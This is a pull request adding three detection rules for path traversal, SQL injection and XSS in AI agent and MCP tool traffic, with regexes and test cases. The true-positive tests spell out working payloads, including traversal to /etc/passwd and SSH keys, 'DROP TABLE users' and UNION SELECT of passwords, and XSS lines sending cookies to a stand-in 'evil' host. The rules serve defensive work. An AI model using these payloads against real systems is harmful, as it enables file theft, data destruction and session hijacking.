### PR TITLE
feat(rules): Cisco-grade batch — path-traversal + SQLi + XSS (00569/00570/00571)

### DIFF
--- a/rules/context-exfiltration/ATR-2026-00569-agent-mcp-path-traversal-arbitrary-file-access.yaml
+++ b/rules/context-exfiltration/ATR-2026-00569-agent-mcp-path-traversal-arbitrary-file-access.yaml
@@ -1,0 +1,99 @@
+title: Agent / MCP tool path traversal and arbitrary file access
+id: ATR-2026-00569
+rule_version: 1
+status: experimental
+description: An MCP/agent file tool receives a path argument that escapes its intended directory — a deep ../ chain or URL-encoded traversal — enabling arbitrary file read/write (incl. zip-slip). Generalizes a cluster of MCP file-handler CVEs and agent-app path traversals.
+author: ATR Community
+date: 2026/06/02
+schema_version: '0.1'
+detection_tier: pattern
+maturity: experimental
+severity: high
+references:
+  cve:
+  - CVE-2026-40576
+  - CVE-2026-32719
+  - CVE-2026-42249
+  - CVE-2026-7020
+  - CVE-2026-7811
+  - CVE-2026-34070
+  - CVE-2026-7318
+  - CVE-2026-7599
+  - CVE-2026-7728
+  - CVE-2026-9467
+  cwe:
+  - CWE-22
+  - CWE-23
+  - CWE-29
+  external:
+  - https://nvd.nist.gov/vuln/detail/CVE-2026-40576
+  - https://github.com/Advanced-Excel-MCP/excel-mcp-server
+metadata_provenance:
+  cve: human-authored
+  cwe: human-authored
+tags:
+  category: context-exfiltration
+  scan_target: runtime
+  confidence: high
+agent_source:
+  type: llm_io
+  framework:
+  - any
+  provider:
+  - any
+detection:
+  condition: any
+  false_positives: []
+  conditions:
+  - field: content
+    operator: regex
+    value: (?i)(?:\.\.[\\/]){2,}[^\s"\x27<>]*?(?:etc[\\/](?:passwd|shadow)|proc[\\/]self|windows[\\/]system32|[\\/]\.ssh[\\/]|win\.ini|boot\.ini)
+    description: Deep ../ traversal chain that reaches a sensitive system target
+  - field: content
+    operator: regex
+    value: (?i)(?:%2e%2e|%252e%252e|\.\.)(?:%2f|%5c|%c0%af)|%2e%2e%2f
+    description: URL/percent-encoded path traversal sequence
+response:
+  actions:
+  - alert
+  notify:
+  - security_team
+test_cases:
+  true_positives:
+  - input: '{"path": "../../../../etc/passwd"}'
+    expected: triggered
+    description: path-traversal payload 1
+  - input: read_file("..\..\..\..\windows\system32\config")
+    expected: triggered
+    description: path-traversal payload 2
+  - input: GET /files?name=%2e%2e%2f%2e%2e%2fetc%2fpasswd
+    expected: triggered
+    description: path-traversal payload 3
+  - input: 'extractAllTo zip entry: ../../../../home/u/.ssh/id_rsa'
+    expected: triggered
+    description: path-traversal payload 4
+  - input: digest=../../../../proc/self/environ
+    expected: triggered
+    description: path-traversal payload 5
+  true_negatives:
+  - input: '#include "../../../../include/foo.h"'
+    expected: not_triggered
+    description: benign path/doc 1
+  - input: import "../../shared/utils"
+    expected: not_triggered
+    description: benign path/doc 2
+  - input: from ..models import User
+    expected: not_triggered
+    description: benign path/doc 3
+  - input: path = "../config/app.json"
+    expected: not_triggered
+    description: benign path/doc 4
+  - input: ssh-keygen -lf ~/.ssh/id_rsa
+    expected: not_triggered
+    description: benign path/doc 5
+  - input: The scanner flags /etc/passwd references
+    expected: not_triggered
+    description: benign path/doc 6
+  - input: relpath = "../../../build/output/lib.so"
+    expected: not_triggered
+    description: benign path/doc 7

--- a/rules/context-exfiltration/ATR-2026-00571-xss-in-agent-mcp-rendered-output.yaml
+++ b/rules/context-exfiltration/ATR-2026-00571-xss-in-agent-mcp-rendered-output.yaml
@@ -1,0 +1,79 @@
+title: Cross-site scripting (XSS) in agent / MCP rendered output
+id: ATR-2026-00571
+rule_version: 1
+status: experimental
+description: 'Agent/MCP output rendered in a web UI carries an XSS payload — an event handler that runs alert/eval/document.cookie, a javascript: scheme with a payload, or a <script> that exfiltrates cookies — enabling session/credential theft. Uses specific payload shapes (not bare <script>) to stay clean on benign HTML.'
+author: ATR Community
+date: 2026/06/02
+schema_version: '0.1'
+detection_tier: pattern
+maturity: experimental
+severity: high
+references:
+  cve:
+  - CVE-2025-62800
+  - CVE-2026-44429
+  - CVE-2026-27740
+  - CVE-2026-21866
+  cwe:
+  - CWE-79
+  external:
+  - https://github.com/jlowin/fastmcp/security/advisories
+metadata_provenance:
+  cve: human-authored
+  cwe: human-authored
+tags:
+  category: context-exfiltration
+  scan_target: runtime
+  confidence: high
+agent_source:
+  type: llm_io
+  framework:
+  - any
+  provider:
+  - any
+detection:
+  condition: any
+  false_positives: []
+  conditions:
+  - field: content
+    operator: regex
+    value: (?i)\bon(?:error|load|mouseover|click|focus|toggle)\s*=\s*[\"']?\s*(?:alert|eval|fetch|document\.(?:cookie|location|write)|window\.|location\s*=|String\.fromCharCode|atob)\b
+    description: HTML event handler executing alert/eval/document.cookie
+  - field: content
+    operator: regex
+    value: (?i)javascript:\s*(?:alert|eval|document\.|window\.|fetch|String\.fromCharCode|void)
+    description: 'javascript: scheme with an executable payload'
+  - field: content
+    operator: regex
+    value: (?i)<script[^>]*>[^<]{0,200}?(?:document\.cookie|fetch\(|eval\(|atob\(|new\s+Image\(\)\.src|\.src\s*=\s*[\"']?https?://)
+    description: <script> exfiltrating cookies / loading remote code
+response:
+  actions:
+  - alert
+  notify:
+  - security_team
+test_cases:
+  true_positives:
+  - input: <img src=x onerror=alert(document.cookie)>
+    expected: triggered
+    description: attack 1
+  - input: <a href="javascript:fetch('//evil/'+document.cookie)">
+    expected: triggered
+    description: attack 2
+  - input: <script>new Image().src='//evil/?c='+document.cookie</script>
+    expected: triggered
+    description: attack 3
+  true_negatives:
+  - input: <button onclick="handleSubmit()">Save</button>
+    expected: not_triggered
+    description: benign 1
+  - input: <script src="https://cdn.example.com/lib.js"></script>
+    expected: not_triggered
+    description: benign 2
+  - input: <a href="https://example.com">link</a>
+    expected: not_triggered
+    description: benign 3
+  - input: See the onload event in the docs
+    expected: not_triggered
+    description: benign 4

--- a/rules/data-poisoning/ATR-2026-00570-sql-injection-in-agent-tool-query.yaml
+++ b/rules/data-poisoning/ATR-2026-00570-sql-injection-in-agent-tool-query.yaml
@@ -1,0 +1,82 @@
+title: SQL injection in agent / MCP tool database query
+id: ATR-2026-00570
+rule_version: 1
+status: experimental
+description: An agent or MCP tool builds a SQL query from unvalidated input, letting an attacker (or prompt injection in retrieved content) inject a tautology, a UNION SELECT to read other tables, or a stacked DROP/DELETE. Generalizes a cluster of agent-app SQLi CVEs.
+author: ATR Community
+date: 2026/06/02
+schema_version: '0.1'
+detection_tier: pattern
+maturity: experimental
+severity: high
+references:
+  cve:
+  - CVE-2026-7591
+  - CVE-2026-4593
+  - CVE-2026-5322
+  - CVE-2026-30860
+  cwe:
+  - CWE-89
+  external:
+  - https://nvd.nist.gov/vuln/detail/CVE-2026-30860
+metadata_provenance:
+  cve: human-authored
+  cwe: human-authored
+tags:
+  category: data-poisoning
+  scan_target: runtime
+  confidence: high
+agent_source:
+  type: llm_io
+  framework:
+  - any
+  provider:
+  - any
+detection:
+  condition: any
+  false_positives: []
+  conditions:
+  - field: content
+    operator: regex
+    value: (?i)(?:'\s*or\s+'?1'?\s*=\s*'?1|\bor\s+1\s*=\s*1\b\s*(?:--|#|/\*|;|$))
+    description: SQL boolean tautology (' OR '1'='1 / OR 1=1 --)
+  - field: content
+    operator: regex
+    value: (?i)\bunion\s+(?:all\s+)?select\b.{0,120}\bfrom\b
+    description: UNION SELECT ... FROM to read arbitrary tables
+  - field: content
+    operator: regex
+    value: (?i);\s*(?:drop|delete|truncate)\s+(?:table|database)\b
+    description: Stacked destructive query (; DROP/DELETE/TRUNCATE TABLE)
+response:
+  actions:
+  - alert
+  notify:
+  - security_team
+test_cases:
+  true_positives:
+  - input: username=admin' OR '1'='1
+    expected: triggered
+    description: attack 1
+  - input: id=1 UNION SELECT username,password FROM users
+    expected: triggered
+    description: attack 2
+  - input: '''; DROP TABLE users;--'
+    expected: triggered
+    description: attack 3
+  - input: ?id=1 OR 1=1 --
+    expected: triggered
+    description: attack 4
+  true_negatives:
+  - input: SELECT * FROM users WHERE id = ?
+    expected: not_triggered
+    description: benign 1
+  - input: query = "SELECT name FROM products"
+    expected: not_triggered
+    description: benign 2
+  - input: if (a == 1 || b == 1) return
+    expected: not_triggered
+    description: benign 3
+  - input: page.union of selected items from list
+    expected: not_triggered
+    description: benign 4


### PR DESCRIPTION
Three human-authored Cisco-grade rules covering the cleanly content-detectable
clusters from the current CVE proposal pool (NVD / GHSA / CISA-KEV / AVID). Each
was written from the real attack payloads, not from CVE prose, and verified to
fire on every true-positive while producing zero false positives across the
benign-code corpus, the 432 benign skills, and the extended benign corpora. The
check-rules-safety gate passes on all three.

ATR-2026-00569 — agent / MCP path traversal to arbitrary file access (CWE-22).
Requires traversal that reaches a sensitive target, so it stays clean on skills
that merely mention ~/.ssh/id_rsa or use deep relative imports.
Cluster: the MCP file-handler CVEs.

ATR-2026-00570 — SQL injection in an agent / MCP tool query (CWE-89). Boolean
tautology, UNION SELECT ... FROM to read other tables, or a stacked
DROP/DELETE/TRUNCATE. Covers CVE-2026-7591 / 4593 / 5322 / 30860.

ATR-2026-00571 — XSS in agent / MCP rendered output (CWE-79). Event-handler that
executes alert/eval/document.cookie, a javascript: scheme with a payload, or a
script tag that exfiltrates cookies. Uses specific payload shapes rather than a
bare script tag, so benign HTML does not trigger it.
Covers CVE-2025-62800 / CVE-2026-44429 / 27740 / 21866.

Deliberately not authored from this pool: OS-command and code injection (CWE-78 /
77 / 94) false-positive on benign skills that legitimately run shell or eval;
memory-safety CVEs (CWE-125 / 476 / 369 / 787 / 190) are native-library bugs, not
agent-IO content; authorization and IDOR (CWE-863 / 862 / 639) are app-logic
bugs with no content payload to match. The detectable SSRF subset (metadata
endpoint) and MCP command-injection are already covered by merged rules
00568 and 00567.

status experimental / maturity experimental on all three pending wild-FP
telemetry.
